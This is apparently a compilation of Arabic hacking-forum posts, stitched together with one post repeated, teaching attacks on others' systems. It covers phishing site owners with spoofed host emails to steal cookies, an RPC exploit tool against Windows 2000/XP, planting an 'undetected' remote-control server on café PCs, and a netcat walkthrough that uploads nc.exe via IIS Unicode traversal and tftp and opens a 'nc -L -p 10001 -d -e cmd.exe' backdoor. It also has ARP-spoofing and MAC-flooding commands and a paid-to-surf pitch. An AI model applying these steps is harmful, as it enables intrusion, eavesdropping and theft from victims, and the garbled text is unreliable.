لنــبدأ الشرح النقطه الاولى لمعرفه نوعيه اصدار المتصفح لصاحب الموقع سهله جدا فكل موقع يصمم على حسب نوعيه المتصفح الخاص بصاحبه ويكت لنا في نهايه الموقع يفضل تصفحه بدقه معينه ويعطيك اصدار الاكسبلور المناسب لتصفح الموقع=المناسب لتصميمه=نفس الاصدار الخاص بهوهذه اسهل نقطه واهم شئ فيها لاختراق المواقع المجانيه واما بالنسبه للوصول الى الضحيه فهناك عده طرق ويجب ان يكون معاك اكواد الهتمل الخاصه بسرقه الكوكيز((ساضعها هنا لاحقا))والان بعدما حصلت على هذه الاكواد تضعها في صفحه وتحاول جذب الضحيه للتوجه لها وهناك عده طرق 1-تاخذ عنوان ماسنجر او ايميله من اي مكان في الموقع اذا وضعه وتحبه وتصير موثوق عنده((هههههههه حب مصلحه))وتعطيه صفحتك الى حطيت فيها الكوكيز او ترسل له ملف سارق الباسوورد 2-مثلا تحدد نوعيه الشركه الى مقدمه الاستضافه المجانيه للموقع فمثلا اذا كان عنوان الموقع www.Name.8m.com فهذا معناه ان الموقع مقدم من شركه فري سيرفر FreeServerSوتستطيع معرفه النطاق المحدده بالدخول الى المواقع المجانيه وعمل تسجيل وستظهر لك انواع الدوامين المتاحه((8m.s5....الخ وتسجل عندهم وسيرسلون لك البيانات ويكون لهم تصميم خاص جدا وانت عليك بسرقه نفس التصميم وتغيير محتوى الرساله((طبعا بالعنقليزي))وارسال رساله منه تتطلب منه فتح موقع((موقعك الى فيه الكود))مثلا لعمل التحديثات اواي شئ اخروهو لن يشك اذا رأى تصميم رسالتك وطريقتك نفس طريقه موقع الشركه وسيفتح الموقع حالا واذا لم يضع ايميله فهناك طريقه وهى انك مثلا تدخل سجل الزوار عندهوتكتب شي يقهره و يجذبه بقوه يعني مثلا تقول له تصميم موقعك مسروق حرفيا من هذا الموقع وتعطيه اللنك((وهو للمره المليون اقلكم الموقع الى فيه الكود))او اي طريقه اخرى من ذكائكواذا لم تجد ايميله او سجل زوار فهناك عليك اختراق الموقع بالثغرات وهو صعب جدا جدا النقطه الثالثه وهي الكوكيز=- يطول شرحها عشان كدا بحط شرحه في موضوع تاني مرفق معاه الاكواد الخاصه بالمتصفحات مع طريقه التعامل معها لسرقه كوكيز الضحيه وتوصيله الى جهازك
شباب كيف حالكم .....في البداية أحب أعرفكم أن هذا الموضوع هو أول موضوع لي في ساحة القراصنة فيارب أكون على حسن ظنكم وأنا جايب معي برنامج ممتاز يدعي Rcp Exploit GUI وهو عبارة عن برنامج يعمل بنظام ثغرتين في أنظمة تشغيل Microsoft وهم Windows 2000 و Windows Xp وهو يبقوم بفتح نافذة الـ Dos (طبعاُ الكل يعرفها) في جهاز الضحية بدون ما تستقبل منه أي شيء على الشبكة وسأقوم بشرحة تفصيلياً كالأتي:- الأدوات اللازمة :- 1- برنامج Angry Ip Scan 2- برنامج rcp-gui
البرنامج من هنــــــــــــــــــــــــــــا هيـــــــــــــــــــا يا قراصنة 3- أي برنامج أختراق أجهزة بكيفك(مثلاًُ برنامج البرورات)====>برنامج مش حلو :] فقط نأخذ منه السيرفر اللى بتكونه في محرر الخادم 1- برنامج Angry Ip Scan هو عبارة عن إسكان Scan بيعمل مسح على أيبيهات Ips ألشبكة التي أنت بداخلها طريقة عملة :- تقوم بتحديد أيبيهات الشبكة اولها من بعد أيبي الـ Gateway وآخرها لحد ما يجي ايبي يكون أسم الكمبيوتر التابع له N/A . مثال:- نفرض أن الأيبي الـ Gateway هو 10.0.0.1 إذا بداية أيبيهات الأجهزة من 10.0.0.2 إلى ما تشوف عندك في البرنامج رقم أيبي أسم الكمبيوتر التابع له N/A أو انت تفرض عدد الموجودين عندك في الخط وتضع رقم تقريباً مثلا من 10.0.0.2 إلى 10.0.0.50 بعد ما حددنا الرقم الأول في الشبكة والرقم الأخيرفي الشبكة نقوم بكتابتة كما توجد في الصوة: 2- برنامج Rcp Exploit GUI بعد ما تظهر لنا هذة الإرقام نقوم بفتح برنامج Rcp Exploit GUI ونختار رقم من أرقام التى قمنا بعمل عليهم اسكان Scan من برنامج angry ip scan ونضعة في البرنامج في مكان ip Address ثم نذهب لعمل حساب Ftp من ايكونة في البرنامج تدعي Ftp Server ونعمل حساب كمافي الصورة:- فائدة هذا الحساب إنه هو اللى بيقوم برفع الملفات من جهازك الى جهازة وتقوم إيضاً بالعكس بعد ما قمنا بعمل الحساب نرجع الى القائمة Expolit ونقوم بالضغط على زر test للتأكد أن تم عمل إتصال بينك وبينه وإذا لم يتم جرب منافذ أخري غير الـ 135 كـ 139 أو 445 وبعد ما تقوم بعمل Connect إضغط على زر Exploit فسيقوم بفتح نافذة سوداء تدعي Dos والتفاصيل في الصورة: وبعد ما تقوم بعمل Connect قم بالظبط بعمل الخطوات المشروحة في الصورة الآتيه:- يا رب تكونوا فهمتوا شرحي المبسط وأي استفسار أنا في الخدمة
السلام عليكم ورحمة الله وبركاته أظن أن جميعكم تعرفون الشبكات المحلية LAN ويعني شبكة داخلية، مثل المقاهي، الشركات...، وهناك طرق لاختراق هذه الشبكة عن طريق حيل يستخدمها المخترقين لذلك الغرض، وفي موضوعنا هذا سنتطرق إلى قسمين لاختراق هذه الشبكات: 1-عن طريق الويندوز 2-عن طريق برنامج remote anything الممتاز البرنامج:اضغط كليك يمين ثم save tagret as http://www.geocities.com/karem_alwh...te-anything.zip أولا: عن طريق الويندوز إذا كنت في مقهى مثلا: اختر start run فإذا أردت الدخول للدرايف C مثلا اكتب: \cاسم الجهاز \\ وإذا كانت هناك مشاركة مخفية جرب: \c$اسم الجهاز \\ ولكن المشكلة هي إسم الجهاز فغالبية الأسماء تكون: client1,client2… أو: pc1, pc2.... لكني سأعلمكم طريقة تكشف بها جميع أسماء الأجهزة الموجودة على الشبكة: Start Run Command C:\net view وسترى أن أسماء جميع الأجهزة على الشبكة موجودة في قائمة وبعد الدخول إلى الجهاز يمكنك مشاهدة جميع الملفات الموجودة بداخلة بدون برامج. ^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*
ثانيا: عن طريق برنامج remote-anything حجم السيرفر: 72.0 ك.ب ***** البرنامج غير مكتشف من جميع برامج الحماية مع التحديث ***** تستطيع بهذا البرنامج التحكم في جميع الأجهزة المتصلة بجهازك على شبكة محلية LAN، مثلا في المقاهي إذا استطعت أن تزرع السيرفر في جهاز واحد أو عدة أجهزة، ستستطيع التحكم فيهم بكل سهولة، ولن أطيل عليكم وهذه الصور التي حضرتها لكم:
1-السيرفر 2-لحذف السيرفر من الجهاز 3-واجهة البرنامج
طبعا وكما توضح الصورة فالباسوورد ثابت طالما أنت تستعمل نسخة تجريبية( يا اهالى منتدى العاصفة يا ريت تعملولنا كراك لهذا البرنامج ) وللدخول إلى جهاز الضحية يجب أولا إرسال السيرفر عن طريق إحدى الطرق المعروفة ومن أشهرها الميسنجر والآن وبعد زرع السيرفر على جهاز أو عدة أجهزة على الشبكة قم بالبحث عن الأجهزة المصابة
لديك عدة خيارات من أهمها الخيار Ping وههو الذي يمتاز به البرنامج حيث تتمكن عن طريقه من التحكم في جهاز الضحية وكأنه أمامك حيث يمكنك مشاركته في الدردشات ويمكنك أن تغلق له إطارات، تحريك مؤشر الفأرة، بكل اختصار يمكنك التحكم فيه وكأنه جهازك، كما يمكنك إيقاف تشغيل الجهاز أو إعادة تشغيله عن طريق الخيارين shutdown و reboot وهناك عدة خيارات أخرى يتمتع بها البرنامج لكننا ذكرنا أهمها. 2-لمحادثة الضحية 3-لسحب أي ملف من جهاز الضحية كما وضحت فإن الخيار ping من أهم الخيارات لذلك قم بالإشارة عليه ثم حدد جهاز الضحية ثم ضع البورت الخاص بالبرنامج وهو 4000 ثم أكتب في خانة password كلمة trial وبعدها قم بضغط زر enter على لوحة المفاتيح ((((((((((((((((منقول الافادة صاحب الموضوع(الكندى نت)))))))))))))))))))
[U][U]اليوم بنتكلم عن موضوع خطير جدا اداة النت كات net cat والاختراق بواسطتها . البرنامج اداه من ادوات الدوس , هي فالحقيقه موجوده فاليونكس , لكن يمكن انزلها للويندوز والتعامل معها . النت كات عباره عن اداه قابلة للكتباه والقرائه عبر اتصالات الشبكات TCP و UDP . ولها استخدامات كثيره جدا و خطيره , مثلا بورت سكان , التنصت على البورتات , والعمل باك دور .
-e specifies a program to exec after making/receiving a connection -g gateway source-routing hop point[s], up to 8 -G num source-routing oiter: 4, 8, 12 -i secs delay interval for lines sent, ports scanned -l listen mode for inbound connections -n only accept numeric IP addresses, no DNS -o file hex dump of traffic -p port local port number -r randomize -s addr local source address -t netcat will respond to telnet option negotiation "this allows it to connect to a telnetd and get past initial negotiation far enough to get a login prompt from the server" -u UDP connection mode -v verbose mode -w secs wait - timeout for connects -z zero I/O mode [used for scanning]
For NT netcat, all of the above options exist, plus a few others.
-d detach - don't open a new DOS window -L keep listening after the current session terminates
بنتكلم عن طريق الاختراق بواسطة النت كات , والخطوات الي يجب ان نقوم بها :
-اولا البورت سكان :
تقدر تسوي سكان على البورتات عن طريق هذا الامر : nc –v –z 192.168.1.90 1-200 او الامر هذا : nc –v –w2 –z 192.168.1.90 1-200
192.168.1.90 هذا هو ايبي الجهاز او الموقع الي تبغي تسوي عليه بورت سكان . طبعن علشان تطلع ايبي الموقع سو له ping ,. مثلا : ping www.drdeathx.com الامر W2 هذا لتحديد مدة الاتصال , مثلا انا اخترت ثانيتين , اذا ماصار تجاوب يروح على البورت الي بعده , اختصار للوقت . 1-200 هذي هي البورتات الي سوينا سكان بينهم , انا اخترت البورتات من 1 الى 200 .
شوفو النتئائج شو طلعت لنا , بورت المتصفح والتلنت والاف تي بي وغيرهم . ومكتوب حذالهم البورت مفتوح وله لا .
-ثانيا الاتصال بالبورتات :
مثلا عندنا موقع ونبغي نطلع معلومات عنه , مثل المعلومات الي يعطينا اياها موقع www.netcraft.com بكل بساطه , نكتب الامر هذا : nc –v –n 192.168.1.90 80
الحين طلعنا معلومات عن البورت 21 و 80 , ولطع لنا ان الموقع شغال على ويندوز 2000 وعلى سيرفر IIS5.0 .و فيه ميكورسوفت FTP
حلو هذي معلومات بتفيدنا في تحديد الهدف للاختراق .
الحين بنشتغل شغل اجمد , وبنبدا فالتطبيق العملي , بنخترق الموقع . بنخلي النت كات يفتح لنا باك دور فالموقع . طبعن لازم نحمل النت كات على الموقع اول شي علشان يفتح لنا الباك دور . كيف ؟؟ بما ان الموقع على سيرفر IIS5.0 , بنستخدم سكربتات اليونيكود الخطيره في رفعه .
وطلعت لنا النتائج : ********s and Settings , Inetpub , Program Files , WINNT حلو , الحين بنرفع النت كات على سيرفر IIS بنستخدم ال tftp , هذي الاداه مشابهه للاف تي بي , اكتب في الدوس tftp , اذا تبغي تعرف المزيد عنها . نرجع الى موضوعنا :
شوفو الاسكربت الي حطيناه هذي المره , نفس السكربت الاولي , لكن بدل امر الاستعراض dir , حطينا امر tftp , وطبقناه , هذي هي طريقه : TFTP [-i] host [GET | PUT] source [destination] نحن في اختراقنا هذا الي سويناه : tftp –I 192.168.1.90 get nc.exe طبعن في اسكربتات اليونيكود بدل المسافه نكتب + فتصير بهذا الشكل : http:///c+TFTP+-i+192.168.1.9+GET+nc.exe
الحين بنبدا فالشغل الحلو , بعد ما رفعنا النت كات وكل شي تمام , نبغي نخلي النت كات يفتح لنا باك دور (Back Door) . علشان نخليه يفتح لنا الباك دور لازم نخليه فالاول يتنصت على بورت فالسيرفر , مثلا اخترت البورت 10001 , بعدين بنقدر نتصل بالبورت من جهازنا بستخدام النت كات .
انزين الحين بنطبق امر التنصت من السيرفر , هذا هو الامر : nc -L -p 10001 -d -e cmd.exe
نشرح شوية الاوامر هذي الي كتبناها : Nc : يخلي الويندوز يشغل النت كات nc.exe -L : يخبر النت كات بان لا يغلق وان ينتظر الانتصال -p : لتحديد البورت الي بنتصنت عليه . -d : يخبر النت كات بالتصال بالبرنامج الي نريد ان نشغله -e : يخبر النت كات بالبرنامج الي نريده ان يشتغل بعد الاتصال بالبورت . طبعن نحن اخترنا الدوس cmd.exe
الحين تمام , النت كات تنصت على البورت 10001 , وفتح لنا باك دور على الدوس cmd.exe
الحين يا دورنا , علشان نتصل من جهازنا على النت كات الي على السيرفر .
الحين مثل ما ملاحظين , بعد ما اتصلنا بالبورت المتنصتين عليه 10001 , بالامر nc –v –n 192.168.1.90 10001
دخلنا على ملف scripts الي فالسيرفر , وطبقنا الامر ipconfig , والنتيجه انه طلع لنا ايبي السيرفر (^_^) الحين تمام صار عندنا تحكم بعيد على السيرفر .
الحين نبغي ننقل الملفات بواسطة النت كات , كيف ؟؟ نقدر عن طريق ال TFTP , لكن لازم نسويها مره ثانيه عن طريق اليونيكود , لكن ليش نحن خلاص تعاملنا الحين مع النت كات وهو افضل وعندنا اتصال خارجي معاه .
اول شي امر استقبال او سحب ملف من السيرفر , مثلا اذا كان فالسيرفر ملف اسمه hack.txt , ونبغي نسحبه , بنطبق هذا الامر : nc –l –p 1234 >hack.txt 1234 هذا هو البورت الي بنستخدمه في سحب الملف .
انزين , واذا حبينا انا نرفع ملف للسيرفر , كيف ؟؟ عن طريق هذا الامر : nc 192.168.1.90 1234 <hack.txt , ^C
الحين تمام , نستعرض محتوايات المجلد بالامر dir , ونتاكد ان كل شي تمام وان الملف انرفع . وعلشان نشغل الملف في السيرفر , نستخدم الامر ! , hack.txt!
مبروك عليك الاختراق , والعمليه تمت بنجاح ...
اتمنى ان يكون الموضوع حاز على اعجابكم , واي استفسار انا حاظر .
تقبلو تحياتي كاتب الموضوع comandos
[U][U]اليوم بنتكلم عن موضوع خطير جدا اداة النت كات net cat والاختراق بواسطتها . البرنامج اداه من ادوات الدوس , هي فالحقيقه موجوده فاليونكس , لكن يمكن انزلها للويندوز والتعامل معها . النت كات عباره عن اداه قابلة للكتباه والقرائه عبر اتصالات الشبكات TCP و UDP . ولها استخدامات كثيره جدا و خطيره , مثلا بورت سكان , التنصت على البورتات , والعمل باك دور .
-e specifies a program to exec after making/receiving a connection -g gateway source-routing hop point[s], up to 8 -G num source-routing oiter: 4, 8, 12 -i secs delay interval for lines sent, ports scanned -l listen mode for inbound connections -n only accept numeric IP addresses, no DNS -o file hex dump of traffic -p port local port number -r randomize -s addr local source address -t netcat will respond to telnet option negotiation "this allows it to connect to a telnetd and get past initial negotiation far enough to get a login prompt from the server" -u UDP connection mode -v verbose mode -w secs wait - timeout for connects -z zero I/O mode [used for scanning]
For NT netcat, all of the above options exist, plus a few others.
-d detach - don't open a new DOS window -L keep listening after the current session terminates
بنتكلم عن طريق الاختراق بواسطة النت كات , والخطوات الي يجب ان نقوم بها :
-اولا البورت سكان :
تقدر تسوي سكان على البورتات عن طريق هذا الامر : nc –v –z 192.168.1.90 1-200 او الامر هذا : nc –v –w2 –z 192.168.1.90 1-200
192.168.1.90 هذا هو ايبي الجهاز او الموقع الي تبغي تسوي عليه بورت سكان . طبعن علشان تطلع ايبي الموقع سو له ping ,. مثلا : ping www.drdeathx.com الامر W2 هذا لتحديد مدة الاتصال , مثلا انا اخترت ثانيتين , اذا ماصار تجاوب يروح على البورت الي بعده , اختصار للوقت . 1-200 هذي هي البورتات الي سوينا سكان بينهم , انا اخترت البورتات من 1 الى 200 .
شوفو النتئائج شو طلعت لنا , بورت المتصفح والتلنت والاف تي بي وغيرهم . ومكتوب حذالهم البورت مفتوح وله لا .
-ثانيا الاتصال بالبورتات :
مثلا عندنا موقع ونبغي نطلع معلومات عنه , مثل المعلومات الي يعطينا اياها موقع www.netcraft.com بكل بساطه , نكتب الامر هذا : nc –v –n 192.168.1.90 80
الحين طلعنا معلومات عن البورت 21 و 80 , ولطع لنا ان الموقع شغال على ويندوز 2000 وعلى سيرفر IIS5.0 .و فيه ميكورسوفت FTP
حلو هذي معلومات بتفيدنا في تحديد الهدف للاختراق .
الحين بنشتغل شغل اجمد , وبنبدا فالتطبيق العملي , بنخترق الموقع . بنخلي النت كات يفتح لنا باك دور فالموقع . طبعن لازم نحمل النت كات على الموقع اول شي علشان يفتح لنا الباك دور . كيف ؟؟ بما ان الموقع على سيرفر IIS5.0 , بنستخدم سكربتات اليونيكود الخطيره في رفعه .
وطلعت لنا النتائج : ********s and Settings , Inetpub , Program Files , WINNT حلو , الحين بنرفع النت كات على سيرفر IIS بنستخدم ال tftp , هذي الاداه مشابهه للاف تي بي , اكتب في الدوس tftp , اذا تبغي تعرف المزيد عنها . نرجع الى موضوعنا :
شوفو الاسكربت الي حطيناه هذي المره , نفس السكربت الاولي , لكن بدل امر الاستعراض dir , حطينا امر tftp , وطبقناه , هذي هي طريقه : TFTP [-i] host [GET | PUT] source [destination] نحن في اختراقنا هذا الي سويناه : tftp –I 192.168.1.90 get nc.exe طبعن في اسكربتات اليونيكود بدل المسافه نكتب + فتصير بهذا الشكل : http:///c+TFTP+-i+192.168.1.9+GET+nc.exe
الحين بنبدا فالشغل الحلو , بعد ما رفعنا النت كات وكل شي تمام , نبغي نخلي النت كات يفتح لنا باك دور (Back Door) . علشان نخليه يفتح لنا الباك دور لازم نخليه فالاول يتنصت على بورت فالسيرفر , مثلا اخترت البورت 10001 , بعدين بنقدر نتصل بالبورت من جهازنا بستخدام النت كات .
انزين الحين بنطبق امر التنصت من السيرفر , هذا هو الامر : nc -L -p 10001 -d -e cmd.exe
نشرح شوية الاوامر هذي الي كتبناها : Nc : يخلي الويندوز يشغل النت كات nc.exe -L : يخبر النت كات بان لا يغلق وان ينتظر الانتصال -p : لتحديد البورت الي بنتصنت عليه . -d : يخبر النت كات بالتصال بالبرنامج الي نريد ان نشغله -e : يخبر النت كات بالبرنامج الي نريده ان يشتغل بعد الاتصال بالبورت . طبعن نحن اخترنا الدوس cmd.exe
الحين تمام , النت كات تنصت على البورت 10001 , وفتح لنا باك دور على الدوس cmd.exe
الحين يا دورنا , علشان نتصل من جهازنا على النت كات الي على السيرفر .
الحين مثل ما ملاحظين , بعد ما اتصلنا بالبورت المتنصتين عليه 10001 , بالامر nc –v –n 192.168.1.90 10001
دخلنا على ملف scripts الي فالسيرفر , وطبقنا الامر ipconfig , والنتيجه انه طلع لنا ايبي السيرفر (^_^) الحين تمام صار عندنا تحكم بعيد على السيرفر .
الحين نبغي ننقل الملفات بواسطة النت كات , كيف ؟؟ نقدر عن طريق ال TFTP , لكن لازم نسويها مره ثانيه عن طريق اليونيكود , لكن ليش نحن خلاص تعاملنا الحين مع النت كات وهو افضل وعندنا اتصال خارجي معاه .
اول شي امر استقبال او سحب ملف من السيرفر , مثلا اذا كان فالسيرفر ملف اسمه hack.txt , ونبغي نسحبه , بنطبق هذا الامر : nc –l –p 1234 >hack.txt 1234 هذا هو البورت الي بنستخدمه في سحب الملف .
انزين , واذا حبينا انا نرفع ملف للسيرفر , كيف ؟؟ عن طريق هذا الامر : nc 192.168.1.90 1234 <hack.txt , ^C
الحين تمام , نستعرض محتوايات المجلد بالامر dir , ونتاكد ان كل شي تمام وان الملف انرفع . وعلشان نشغل الملف في السيرفر , نستخدم الامر ! , hack.txt!
مبروك عليك الاختراق , والعمليه تمت بنجاح ...
اتمنى ان يكون الموضوع حاز على اعجابكم , واي استفسار انا حاظر .
[السلااااااااااام عليكم .....هذا موضوع كتبته في وقت سابق في منتدي المدمر وحبيت انقله هنا للفائده
الشبكات هي الاساس حتي ان البعض يقول ان الكمبيوتر بدون الشبكات ليس له اي قيمه مثل ماتعرفون ياشباب الانترنت هي المزيد من الشبكات المحليه مرتبطه في مابينها لتشكل الانترنت كل واحد منكم متصل عن طريق شبكه ما ........... لكي انشط ذهنك حاول ان تفهم كيف تمكنت من الوصول الي هذا الموضوع كم شبكه اجتزت بينك وبين هذا الموضوع الشبكات المحليه ترتبط فيما بينها علي hub او سويتش وتوصل عن طريق راوتر الي الانترنت والراوتر هذا يعتبر الــgateway للشبكه . قد تكون عندك خبره عن الشبكات وقد تكون استخدمتها اما في مقاهي النت او بالجامعات او في العمل او في اي مكان اخر كذلك الامر لمن يستخدمون الاجهزه الشخصيه والمودم وخط التليفون فهم بالحقيقه يدخلون شبكه مزود الخدمه وبعد كذا تصبح العمليه كما ذكرت فوق
المختصر ان كل منا علي شبكه محليه اما مباشره او يدخل اليها عن طريق الوصول البعيد
ماعليناااااااااااااااااااااااا مو هنا لب الموضوع بس ذكرته عشان اوضح الصوره الشبكات المحليه LAN هي روح الشبكات WAN عشان كذا دعونا نلقي الضوء علي الجانب المظلم من التقنيات التي تعمل علي الشبكات المحليه ابي اتكلم عن شبكات Ethernet بالتحديد لنفرض انك في شبكه محليه متصله بالانترنت الهاردوير في هذه الشبكه عباره عن راوتر (اي نوع ) وسويتش (اي نوع ) وكروت شبكه موصوله بالاجهزه (nic) الان الراوتر موصول بمودم ومتصل علي مزود الخدمه وله ip ثابت السويتش موصول بالراوتر كقسام يوزع الاتصال للاجهزه لنفرض انه 24 بورت وهناك اربع وعشرين جهاز مع كرت شبكه موصوله الي السويتش وتتقاسم اتصال الانترنت الراوتر له 2 اي بي واحد للشبكه المحليه ويسمي الــgateway والثاني اي بي wan مقدم من مزود الخدمه للدخول علي الانترنت لنفرض ان الاي بي المحلي للراوتر 192.168.2.1 والاجهزه لها النطاق التالي 192.168.2.2 - 192.168.2.25 مع العلم اننا نستطيع جعل الراوتر dhcp سيرفر ونخليه يعطي الايبيات علي كيفه بس خلونا نناقش الوضع الاول احسن
الان انتم بالصوره تماما ............ لنفرض انك علي احد الاجهزه وتريد اختراق الشبكه كامله مع العلم ان الادمن حق الشبكه حريف وخبير امني من الطراز الاول ...... يعني مسوي حمايه حديديه للشبكه علي مستوي التطبيقات الان يجب عليك لكي تتمكن من اختراق الشبكه اعتراض المعلومات والتجسس علي حركه البيانات داخل الشبكه الادمن يعرف ان الشبكات علي السويتش لايمكن اعتراضها (معلومه صحيحه حتي وقت قريب) وكان يعرف الحقائق التاليه : ان الشبكات في بيئه Ethernet تاتي علي نوعين 1- Shared Ethernet وهذي الباكت packets فيها ترسل الي جميع الاجهزه الموصله ويمكن لاي جهاز مفعل promiscuous mode في كرت الشبكه ان يعترض جميع البيانات علي الشبكه وهذي الشبكات التي تعمل علي hub ويمكن اعتراض البيانات sniff عليها باي sniffer ولايلزم المخترق خبرات كبيره لكي ينفذ هذا الهجوم (وادمن الشبكه اللي نتحدث عنها لايخاف من هذا الهجوم لان شبكته علي سويتش 2-Switched Ethernet هذا النوع يعتمد علي ذكاء السويتش اللي يحتفظ بجدول لكل عناوين الماك MAC في الشبكه ويرسل البيانات للجهاز المحدد ولا يذيع البيانات لكل الاجهزه وفي هذا النوع لايمكن تفعيل promiscuous mode من هنا تاتي ثقه الادمن حقنا ان اعتراض البيانات لايمكن ان يتم علي شبكته
الان انا ابشرحلكم كيف يتم اعتراض البيانات علي شبكات السويتش بالشبكه المذكوره بس قبل كذا خلوني اعطيكم بعض اساسيات الشبكات من هالنوع : لكل جهاز موصول في هذه الشبكه عنوانين الاول MAC address مخزن في كرت الشبكه وهو مميز وفريد وياتي مع الكرت من المصنع ويستخدم بواسطه Ethernet protocol عند بناء الفريم frame للباكج لارسالها واستقبالها من الكرت المحدد والعنوان الثاني IP address واللي يستخدم في التطبيقات علي الشبكه الان ركزوا :Ethernet header يستخدم الــMAC address حق الجهاز المحدد وليس IP address وعمل طبقه الشبكه network layer هو تخطيط عناوين MAC address وعناوين IP address المرتبطه بها لن الــData Link Protocol تطلب هذا ويتم بالطريقه التاليه يتم البحث في جدول يسمي ARP cache عن عنوان الماك والاي بي المرتبط به اذا لم يجد شيئافي هذا الجدول يقوم بروتوكول ARP بارسال مايسمي الــARP request الي جميع الاجهزه بالشبكه .... الان الجهاز اللي يحمل نفس العنوان في الطلبـARP request يستجيب بالرد عن طريق ARP reply الي المصدر اللي ارسل الطلبـARP request ويحملالرد الماك ادرس للجهاز المستجيب وبعد كذا المصدر يخزن الماك ادرس في ARP cache حقت الجهاز المصدر
الان انتهينا من فهم الاساسيات دعونا نري الطرق اللي يمكن تنفيذ الهجوم من خلالها : 1- ARP Spoofing تتم هذه الطريقه عن طريق تحديد الجهاز الهدف وتزوير الـــARP cache في هذا الجهاز عن طريق انتحال شخصيه الــgateway بهذه الطريقه نستطيع اعتراض كل المعلومات من والي الجهاز الهدف اساسا تعتمد هذه الطريقه علي حقيقه انه يمكن ارسال ARP reply بدون ان يطلب عن طريق الطلبـARP request والمشكله انه سوف يقبل داخل الشبكه اذا مافعلناه هو تزوير الماك ادرس للــgateway بالماك ادرس تبع جهازنا في الـــARP cache للجهاز الضحيه سوف اقول لكم كيف التنفيذ عمليا لكن هناك نقطه يجب ان تفهمها اننا نستيطع كذلك تزوير الماك ادرس لــgateway الي FF:FF:FF:FF:FF:FF وهذا العنوان اذا استبدلته بالماك ادرس تبعك سوف تعمل الطريقه السابقه هناك العديد من ادوات هذا الهجوم موجوده بالنت لكن افضلها هي arpspoof لنري كيف ينفذ الهجوم في هذه الاداه وسوف اشرح علي نظام اللينكس رغم ان هذا الهجوم يطبق من جميع انواع انظمه التشغيلبما فيها المذكور ويندز اول شي يجب تفعيل IP Forwarding لجهازك ويتم عن طريق التالي اكتب بالشل : كود PHP: echo 1 > /proc/sys/net/ipv4/ip_forward
وبعدين نفذ الامر التالي للتاكد من ان الــIP Forwarding فعل بنجاح
كود PHP: cat /proc/sys/net/ipv4/ip_forward
الان اذا ظهر الرقم واحد كخرج للامر اذ فعل بنجاح ......نرجع للــarpspoof تستطيع التزوير بالطريقه التاليه : اكتب الامر :
كود PHP: arpspoof -t ipaddress1 ipadress2
الـــipadress1 عنوان الجهاز الهدف والـــipadress2 عنوان الــgateway سيظهر لنا خرج شبيه بالتالي
الان كل الترفك القادمه من gateway الي الجهاز الهدف ستمر عبر جهازنا
الطريقه الثانيه :MAC Flooding السويتش فيه جدول يسمي translation table يقوم بتخطيط الماك ادرس مع البورت الفيزيائي للجهاز لبهدف في السويتش يعني يحدد كل منفذ فيه وشو الماك ادرس حقه حلووووووووو مشكله translation table ان ذاكره التخزين فيه صغيره يعني نسوي فلووود له حتي يمتلي ولا يستطيع الاحتفاظ بعناوين اضافيه .....بعد النجاح في هذا الكلام يدخل السويتش بما يسمي failopen mode وهذه الحاله تجعل السويتش ينسي انه سويتش ويقعد يشتغل بنفس الطريقه التي يعمل بها الـــhub يعني يصير اذاعه مثل صاحبنا الــhub ونرجع لنقطه البدايه اللي تقول ان اي سنفر ممكن انه يعمل علي شبكه موصوله بــhub يطبق هجوم MAC Flooding عن طريق الاداه macof والتي تاتي هي والــarpspoof والكثير من الادوات القويه مع الحزمه dsniff المتوفره علي الانترنت في كل مكان اما بالنسبه لمستخدمي المذكور فقد فهمتم الاساسيات وانا متاكد ان فيه ادوات للمذكور بس والله ناسي اسمائها
أعزائي الآن يمكنكم تصفح الإنترنت بدون دفع فاتورة الحساب ولكم مرتب شهري
من فضلكم يجب قراءة هذه السطور بعناية : لماذا تتصفحون الإنترنت وتدفعون فيالنهاية فاتورة الحساب ؟ ولماذا تحسبون الوقت بالدقيقة أثناء تصفحكم للشبكةوتستعجلون في الخروج الفوري من الشبكة حرصا على عدم زيادة الفاتوره؟ الآن يمكنكمتصفح الإنترنت كما تشاءون من 5 -10 ساعات أو حتى اليوم كله ولا خوف من دفع فاتورةالتليفون في نهاية الشهر لأن هناك من سيدفع لكم فاتورة النت بالإضافة إلى مرتب شهريآخر .
ولتوضيح ذلك : هناك برنامج صغير يتم تنزيله من الشبكة وتنصيبه على الكمبيوتر وهوعبارة عن شاشة صغيرة تظهر فى أعلى الشاشة وفوق المتصفح مباشرة لكي يعرض لك إعلاناتإشهارية من جميع شركات العالم أو بمعنى آخر دعاية وإعلان لتتعرف على منتجات تلكالشركات فربما وستعطيك شركة الإعلانات نسبة من مصاريف الدعاية والإعلان وتكون تلك النسبةدولار عن كل 1000 نقطه اي حوالي الساعه تقضيها على الانترنت (1000نقطة=1ساعة=1دولار) ويتم حساب النقط هذه بواسطة عداد داخل البرنامج الذي سيظهرأمامك أعلى الشاشة يشبه عداد الثواني إذا كان جهازك بطيئا فربما تقل النقاط بسببهذا البطء وتكون ال 1000 نقطه في ساعه ونصف مثلا المهم ان 1000 نقطه = 1 دولار إنها حقيقة لا خيال ولن تدفع أي مصاريف إطلاقا انهميريدون توصيل إعلاناتهم إليك أينما كنت وهذه اسهل طريقة لكي يصل إليك الإعلانبسهولة وسيدفعون لك المال لكي تشاهد إعلانات آلاف الشركات المتنافسة إنها شركاتضخمة وعالمية تدفع بالملايين بل بالمليارات على تلك الدعاية والإعلانات فلا تترددالأمر لا يحتاج منك شئ .ويمكنك أيضا أن تتصفح مواقعك المفضلةوتتجول في الإنترنت كما تشاء فلن يعوقك هذا البرنامج إطلاقا .
طريقة البرنامج
الطريقة هي عرض الدعايات على شاشتك من خلال برنامج يتمتحميله من الشركة و مقابل هذه الإعلانات فإنك ستربح أموالاً والبرنامج يحتاج إلىاشتراك وملء البينات الصحيحة
سؤال مهم هل أنا لازم أتطلع على هذهالإعلانات ؟ لا طبعا أنت فقط دعه شغالاً واشتغل على الانترنت مثل كل مرة ,المهم انك تترك البرنامج يعرض الإعلانات على شاشتك
طريقة الإشتراك اولا يجب عليك الذهاب إلى صفحة التسجيل وهي هنا : إفتح هذا الموقع
و إضغط عليها أدخل اسم للدخول Login كلمة السر password تكرار كلمة السر Verify password الاسم الاول First name الاسم الاخير Last name اسمالشارع Street address المدينة City الرقم البريدي Zip postal code اذاكنت خارج امريكا اتركه فارغا State اتركه فارغا Province اسم دولتك Country البريد الإلكترونيE- mail address اعادة ادخال البريد الإلكتروني Verify e- mail address
